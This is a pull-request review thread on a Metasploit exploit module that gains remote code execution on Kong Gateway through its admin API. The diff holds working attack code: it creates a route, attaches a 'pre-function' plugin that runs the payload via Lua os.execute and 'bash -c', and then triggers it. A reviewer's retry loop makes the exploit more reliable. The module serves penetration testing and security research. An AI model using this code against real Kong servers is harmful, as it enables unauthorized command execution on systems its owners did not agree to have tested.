modules/exploits/multi/http/kong_gateway_admin_api_rce.rb

```diff
@@ -0,0 +1,139 @@
+        route is deleted, which also deletes the plugin.',
+      'License' => MSF_LICENSE,
+      'Author' => ['Graeme Robinson'],
+      'References' =>
+      [
+        ['URL', 'https://konghq.com/'],
+        ['URL', 'https://github.com/Kong/kong'],
+        ['URL', 'https://docs.konghq.com/hub/kong-inc/serverless-functions/']
+      ],
+      'Platform' => %w[linux macos],
+      'Arch' => [ARCH_X86, ARCH_X64],
+      'Targets' =>
+      [[
+        'Unix (In-Memory)',
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Type' => :unix_memory
+      ]],
+      'Privileged' => false,
+      'DisclosureDate' => 'Oct 13 2020',
+      'DefaultOptions' => { 'RPORT' => 8001 },
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+      }
+    ))
+    register_options(
+      [
+        OptString.new('PUBLIC-API-RHOST', [false, 'The host where the public API is available, if different to RHOST']),
+        OptInt.new('PUBLIC-API-RPORT', [true, 'The port where the public API is available', 8000]),
+        OptString.new('TARGETURI', [true, 'URI to the Kong server', '/'])
+      ],
+      self.class
+    )
+  end
+
+  def check_response(response, expected, path, description)
+    fail_with(Failure::Unreachable, "No response received from #{path} when #{description}") unless response
+    return if response.code == expected
+
+    fail_with(Failure::UnexpectedReply,
+              "Unexpected response from #{path} when #{description} (received #{response.code}, expected #{expected})")
+  end
+
+  def create_route
+    path = normalize_uri(target_uri.path, 'routes')
+    response = send_request_cgi({ 'method' => 'POST', 'uri' => path,
+                                  'vars_post' => { 'name' => @rand_name, 'paths' => '/' + @rand_name } })
+    check_response(response, 201, path, 'creating route')
+  end
+
+  def create_plugin
+    # The double square brackets helps to ensure single/double quotes in cmd payload do not interfere with syntax of
+    # os.execute Lua function. The ampersand backgrounds the command so that it doesn't cause Kong to hang.
+    cmd = %{os.execute([[bash -c "#{payload.encoded}" &]])}
+    path = normalize_uri(target_uri.path, 'routes', @rand_name, 'plugins')
+    response = send_request_cgi({ 'method' => 'POST', 'uri' => path,
+                                  'vars_post' => { 'name' => 'pre-function', 'config.access' => cmd } })
+    check_response(response, 201, path, 'creating plugin')
+  end
+
+  def request_route
+    path = normalize_uri(target_uri.path, @rand_name)
+    rhost = datastore['PUBLIC-API-RHOST'] if datastore['PUBLIC-API-RHOST']
+    rport = datastore['PUBLIC-API-RPORT'] if datastore['PUBLIC-API-RPORT']
+    response = send_request_cgi({ 'uri' => path, 'rhost' => rhost, 'rport' => rport })
+    check_response(response, 503, path, 'requesting route')
```

Comment:
Following up to my other comments. I have done some testing locally to see if I could get a fix/confirm it was a race condition. 
It seems that a race condition was in fact present, the code below was how I arrived at a fix. I added a rescue to allow for the original error that was being posted to the terminal:
```
[-] Exploit aborted due to failure: unexpected-reply: Unexpected response from /zOm4J0KYSo when requesting route (received 404, expected 503)
```

This allowed `request_route` to be slept and retried until the route had been created. 

```suggestion
retry_count = 0
    begin
      response = send_request_cgi({ 'uri' => path, 'rhost' => rhost, 'rport' => rport })
      check_response(response, 503, path, 'requesting route')
    rescue Msf::Exploit::Failed
      if retry_count <= 3
        retry_count += 1
        puts 'Requesting route...'
        sleep(retry_count**2)
        retry
      end
      raise 'Could not establish a connection!'
    end
```

Reply:
Oh, nice! Thanks for implementing the fix for me! It certainly saves me some time (especially as I don't see the unreliable behaviour on my system) and it is nicer code than I would have written 😉. Cheers!